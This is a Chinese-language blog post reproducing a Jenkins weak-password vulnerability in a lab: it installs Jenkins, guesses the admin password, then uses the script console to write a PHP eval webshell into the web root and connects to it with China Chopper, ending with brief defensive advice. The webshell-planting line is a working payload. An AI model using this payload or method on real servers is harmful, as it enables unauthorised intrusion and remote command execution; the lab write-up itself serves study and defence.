jenkins弱口令漏洞

jenkins弱口令漏洞

一、漏洞描述

通过暴力破解管理控制台,如果爆破成功,可获得后台管理权限。操作后台,后台可通过脚本命令行功能执行系统命令,如反弹shell等,低权限可以通过创建控制台输出方式执行命令。

二、漏洞环境搭建

1、 官方下载jenkins-2.50-1.1.noarch.rpm,下载地址: http://mirrors.jenkins.io

2、在redhat6.5上安装jenkins

2.1、使用rpm安装

rpm -ivh jenkins-2.50-1.1.noarch.rpm

  

2.2、启动服务

  

2.3、浏览器访问http://192.168.10.137:8080,如下图所示需要输入密码,密码文件在如下图位置

   

2.4查看密码文件,输入密码后进入如下界面,选择安装建议的插件

  

2.5、安装完插件之后,进入如下界面,设置用户名和密码

  

2.6、设置完用户和密码之后,进入如下界面,点击如下图位置,到此为止,jenkins环境搭建成功

  

   

三、漏洞复现

1、浏览器访问http://192.168.10.137:8080

  

2、猜解出密码,然后登录,点击”系统管理”

  

3、选择如下图所示

  

4、利用”脚本命令行”上传webshell,内容如下:

new File("/var/www/html/media.php").write('<?php @eval($_POST[cmd]);?>');

  

5、点击“运行”,没有报错,上传成功

6、菜刀连接

  

四、漏洞防御

1、增强后台密码强度

2、后台不对外开放

 

-------------------------------------------------------------------------------

参考链接:https://www.secpulse.com/archives/2166.html

posted @ 2019-08-03 13:43  雨中落叶  阅读(4405)  评论(0编辑  收藏  举报